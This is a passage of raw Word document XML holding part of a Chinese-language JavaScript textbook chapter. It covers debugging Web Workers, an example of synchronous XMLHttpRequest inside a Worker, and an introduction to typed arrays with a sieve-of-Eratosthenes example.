      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>中，有一个</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>是不可用的（至少截至撰写本书时是不可用的）：控制台</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>以及它非常有用的</w:t>
      </w:r>
      <w:r>
        <w:t>console.log()</w:t>
      </w:r>
      <w:r>
        <w:t>函数。</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程不能输出日志，也不能和文档进行交互，因此要想调试，就要采用更加巧妙的方法。如果</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>抛出错误，那么主线程在</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>对象上会接收到一个</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>事件。但是，通常情况下，需要一种方式能够让</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>将调试消息输出到浏览器的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>控制台中。其中，最直接的方式就是通过修改和</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>间的消息传递协议，来让</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>将调试消息传递出</w:t>
      </w:r>
      <w:r>
        <w:t>来。比如，在例</w:t>
      </w:r>
      <w:r>
        <w:t>22-6</w:t>
      </w:r>
      <w:r>
        <w:t>中，可以将如下代码添加到</w:t>
      </w:r>
      <w:r>
        <w:t>onmessage</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序的最开始：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(typeof e.data==="string"){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log("Worker:"+e.data);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>有了新增的这部分代码，</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程只要简单地将字符串传递给</w:t>
      </w:r>
      <w:r>
        <w:t>postMessage()</w:t>
      </w:r>
      <w:r>
        <w:t>方法就能够实现展示调试消息了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面的例子展示了</w:t>
      </w:r>
      <w:r>
        <w:t>Web Worker</w:t>
      </w:r>
      <w:r>
        <w:t>如何允许书写同步代码并在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中放心地使用它。</w:t>
      </w:r>
      <w:r>
        <w:t>18.1.2</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍过如果使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>实现同步的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求，但是也警告过，在主浏览器线程中这样使用是个很不好的实践。然而，在</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程中进行同步请求是再理想不过的了，例</w:t>
      </w:r>
      <w:r>
        <w:t>22-8</w:t>
      </w:r>
      <w:r>
        <w:t>正是展示的是与之相关的例子。其中的</w:t>
      </w:r>
      <w:r>
        <w:t>onmessage</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序接受一个待获取的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>数组。它通过同步</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest API</w:t>
      </w:r>
      <w:r>
        <w:t>来进行获取，然后，将获取到的文本内容以字符串的形式，组成一个数组，传递回主线程。或者，如果在</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求过程中失败了，则会抛出错误，并会将其传递给</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-8</w:t>
      </w:r>
      <w:r>
        <w:t>：在</w:t>
      </w:r>
      <w:r>
        <w:t>Web Worker</w:t>
      </w:r>
      <w:r>
        <w:t>中发</w:t>
      </w:r>
      <w:r>
        <w:t>起同步</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>此文件会通过一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>Worker()</w:t>
      </w:r>
      <w:r>
        <w:t>来载入，因此，它是运行在独立的线程中的，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>可以放心地使用同步</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>消息是</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>数组的形式。以字符串形式同步获取每个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>指定的内容，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并将这些字符串数组传递回去。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>onmessage=function(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var urls=e.data;//</w:t>
      </w:r>
      <w:r>
        <w:t>输入：要获取的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var contents=[];//</w:t>
      </w:r>
      <w:r>
        <w:t>输出：</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>指定的内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>urls.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var url=urls[i];//</w:t>
      </w:r>
      <w:r>
        <w:t>每个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var xhr=new XMLHttpRequest();//</w:t>
      </w:r>
      <w:r>
        <w:t>开始一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>xhr.open("GET",url,false);//false</w:t>
      </w:r>
      <w:r>
        <w:t>则表示进行同步请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>xhr.send();//</w:t>
      </w:r>
      <w:r>
        <w:t>阻塞住，一直到响应完成</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(xhr.status!==200)//</w:t>
      </w:r>
      <w:r>
        <w:t>如果请求失败则抛出错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw Error(xhr.status+""+xhr.statusText+":"+url);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>contents.push(xhr.responseText);//</w:t>
      </w:r>
      <w:r>
        <w:t>否则</w:t>
      </w:r>
      <w:r>
        <w:t>，存储通过</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>获取得到的内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>最后，将这些</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>内容以数组的形式传递回主线程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>postMessage(contents);</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56" w:name="22_5_Lei_Xing_Hua_Shu_Zu_He_ArrayBuffer"/>
      <w:r>
        <w:t>22.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　类型化数组和</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="556"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>正如第</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍的那样，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的数组是包含多个数值属性和一个特殊的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性的通用对象。数组元素可以是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中任意的值。数组可以动态地增长和收缩，也可以是稀疏数组。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的实现中对数组做了很多的优化，使得典型的数组操作可以变得很快。类型化数组就是类数组对象（参见</w:t>
      </w:r>
      <w:r>
        <w:t>7.11</w:t>
      </w:r>
      <w:r>
        <w:t>节），它和常规的数组有如下重要的区别：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>类型化数组中的元素都是数字。使用构造函数在创建类型化数组的时候决定了数组中数字（有符号或者无符号整数或者浮点数）的类型和大小（以位为单位）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>类型化数</w:t>
      </w:r>
      <w:r>
        <w:t>组有固定的长度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>在创建类型化数组的时候，数组中的元素总是默认初始化为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一共有</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>种类型化数组，每一种的元素类型都不同。可以使用如下所示的构造函数来创建这</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>种类型化数组：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251742208" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3243532" cy="1781354"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="83" name="00083.jpeg" descr="000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3.jpeg" descr="00083.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId86"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3243532" cy="1781354"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>类型化数组、＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞和核心</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类型化数组是用于＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>WebGL 3D</w:t>
      </w:r>
      <w:r>
        <w:t>图形化</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>中重要的一部分，浏览器已经将它们实现成为</w:t>
      </w:r>
      <w:r>
        <w:t>WebGL</w:t>
      </w:r>
      <w:r>
        <w:t>的一部分。本书不会对</w:t>
      </w:r>
      <w:r>
        <w:t>WebGL</w:t>
      </w:r>
      <w:r>
        <w:t>做介绍，但是类型化数组通常有用，因此在这里做相应的介绍。回忆一下，在第</w:t>
      </w:r>
      <w:r>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:t>章中介绍过，画布</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一个</w:t>
      </w:r>
      <w:r>
        <w:t>getImageDat</w:t>
      </w:r>
      <w:r>
        <w:t>e()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，该方法返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性就是一个字节数组。在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标准中把这叫做</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasPixelArray</w:t>
      </w:r>
      <w:r>
        <w:t>，但是，它基本上和这里描述的</w:t>
      </w:r>
      <w:r>
        <w:t>Uint8Array</w:t>
      </w:r>
      <w:r>
        <w:t>是一样的，除了它可以处理超过</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>255</w:t>
      </w:r>
      <w:r>
        <w:t>范围的值之外。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要注意的是，这些类型不是核心语言的一部分。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言未来的版本可能会引入对这些类型化数组的支持，但是，截至撰写</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>本书时，都尚未清楚，是否</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言本身会采用这里描述的这些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>还是创建新的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在创建一个类型化数组的时候</w:t>
      </w:r>
      <w:r>
        <w:t>，可以传递数组大小给构造函数，或者传递一个数组或者类型化数组来用于初始化数组元素。一旦创建了类型化数组，就可以像操作其他类数组对象那样，通过常规的中括号表示法来对数组元素进行读</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写操作：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var bytes=new Uint8Array(1024);//1KB</w:t>
      </w:r>
      <w:r>
        <w:t>字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>bytes.length;i++)//</w:t>
      </w:r>
      <w:r>
        <w:t>循环数组的每个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bytes[i]=i</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>0xFF;//</w:t>
      </w:r>
      <w:r>
        <w:t>设置为索引的低</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>位值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var copy=new Uint8Array(bytes);//</w:t>
      </w:r>
      <w:r>
        <w:t>创建数组的副本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>ints=new Int32Array([0,1,2,3]);//</w:t>
      </w:r>
      <w:r>
        <w:t>包含这</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t>值的类型化数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>现代</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言实现对数组进行了优化，使得数组操作已经非常高效。不过，类型化数组在执行时间和内存使用上都要更加高效。下面的函数用于计算出比指定数值小的最大素数。它使用了埃拉托色尼筛选算法，该算法要求使用一个大数组来存储哪些数字是素数，哪些是合数。由于每个数组元素只要使用一位信息，因此这里使用</w:t>
      </w:r>
      <w:r>
        <w:t>Int8Array</w:t>
      </w:r>
      <w:r>
        <w:t>要比使用常规的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组更加高效：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用埃拉托色尼筛选算法，返回一个小</w:t>
      </w:r>
      <w:r>
        <w:t>于</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>的最大素数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function sieve(n){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=new Int8Array(n+1);//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>是合数，则</w:t>
      </w:r>
      <w:r>
        <w:t>a[x]</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var max=Math.floor(Math.sqrt(n));//</w:t>
      </w:r>
      <w:r>
        <w:t>因数不能比它大</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var p=2;//2</w:t>
      </w:r>
      <w:r>
        <w:t>是第一个素数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(p</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=max){//</w:t>
      </w:r>
      <w:r>
        <w:t>对于小于</w:t>
      </w:r>
      <w:r>
        <w:t>max</w:t>
      </w:r>
      <w:r>
        <w:t>的素数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=2*p;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=n;i+=p)//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>的倍数都标记为合数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a[i]=1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
